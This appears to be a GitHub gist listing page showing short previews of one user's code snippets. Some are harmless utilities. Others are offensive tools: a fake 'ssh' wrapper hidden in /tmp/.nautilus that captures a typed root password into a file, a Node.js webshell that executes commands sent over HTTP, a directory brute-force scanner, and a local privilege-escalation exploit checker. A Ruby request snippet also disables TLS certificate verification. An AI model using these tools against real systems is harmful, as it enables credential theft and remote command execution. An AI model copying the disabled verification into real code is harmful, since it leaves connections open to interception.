Skip to content

Instantly share code, notes, and snippets.

View khakimov's full-sized avatar

Ruslan khakimov

23 followers · 17 following
View GitHub Profile
@khakimov
khakimov / gist:4173537
Created November 30, 2012 03:05
https request
require "net/https"
require "uri"
uri = URI.parse("url")
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
request = Net::HTTP::Get.new(uri.request_uri)
@khakimov
khakimov / -fno-stack-protector.c
Created December 3, 2012 21:35
stack_protection
0x0000000100000eb0 <test_function+0>: push %rbp
0x0000000100000eb1 <test_function+1>: mov %rsp,%rbp
0x0000000100000eb4 <test_function+4>: mov %edi,-0x4(%rbp)
0x0000000100000eb7 <test_function+7>: mov %esi,-0x8(%rbp)
0x0000000100000eba <test_function+10>: mov %edx,-0xc(%rbp)
0x0000000100000ebd <test_function+13>: mov %ecx,-0x10(%rbp)
0x0000000100000ec0 <test_function+16>: movl $0xb,-0x20(%rbp)
0x0000000100000ec7 <test_function+23>: movb $0x41,-0x1a(%rbp)
0x0000000100000ecb <test_function+27>: pop %rbp
0x0000000100000ecc <test_function+28>: retq
@khakimov
khakimov / gist:4274609
Created December 13, 2012 06:50
http to https
if (document.location.protocol === 'https:') {
// http to https for <link>
var links = document.getElementsByTagName('link');
for(i = 0; i < links.length; i++)
{
if(links[i].href.indexOf('http:') > -1) {
link = links[i].href.replace('http:', 'https:');
links[i].href = link;
@khakimov
khakimov / dirscan.sh
Last active December 11, 2015 01:49
alex, alex we got in! so what next? If you’re working with a scope that limits tools you can install or just want to scan something very fast without install anything - just use this script with dir list such as http://zaproxy.googlecode.com/svn/trunk/src/dirbuster/directory-list-2.3-medium.txt
#!/bin/sh
# echo "usage: $0 dirlist target.com"
# can use with https - just use curl -k ...
for i in $(cat $1)
do
echo "dir: $i \tcount: " `curl $2/$i 2>/dev/null | wc -l`
done
# so, just run it
@khakimov
khakimov / ssh
Created January 14, 2013 19:10
script kiddos
#/bin/sh
# add to .bashrc or .profile
# export PATH=/tmp/.nautilus:$PATH
# chmod +x /tmp/.nautilus/ssh
echo "root@10.1.1.1's password: "
stty -echo
read input_variable
stty echo
echo "$input_variable" > /tmp/.nautilus/pass
@khakimov
khakimov / priv_local.py
Created February 1, 2013 02:09
local root? w00t-w00t
import subprocess
def exploitCheck():
# Shout out to Bernardo Damele for letting me use this code! Thanks again!
# Check out his blog at http://bernardodamele.blogspot.com
exploitdb_url = "http://www.exploit-db.com/exploits"
enlightenment_url = "http://www.grsecurity.net/~spender/enlightenment.tgz"
print "[+] Results for local kernel version %s" % kernel
@khakimov
khakimov / harlem.sh
Created February 22, 2013 20:13
#!/bin/bash
for n in {1..5}
do
out=$(( $n % 2 ))
if [ $out -eq 0 ]
then
printf "1\r"
else
printf "0\r"
fi
@khakimov
khakimov / gist:5130151
Created March 10, 2013 19:53
node.js command webshell
var sys = require('sys'),
exec = require('child_process').exec,
child,
http = require('http');
child = function(res, cmd) {
exec(cmd,
function (error, stdout, stderr) {
res.end(stdout);
if (error !== null) {
@khakimov
khakimov / blood_tests_price.rb
Created May 13, 2014 21:07
require 'json'
require 'open-uri'
url = 'https://www.theranos.com/api/tests'
resp = open(url).read
json_tests = JSON.parse(resp)
all_tests_price = 0
json_tests.each do |x|
all_tests_price += x["TheranosPrice"].to_f
@khakimov
khakimov / gist:9aee5f3914b98e06350d
Created January 20, 2016 07:43
git the hard way
# mkdir -p logs/refs/heads
# mkdir -p refs/remotes/origin
# mkdir -p refs/heads
# mkdir -p info
files=(
"HEAD"
"objects/info/packs"
"description"
"config"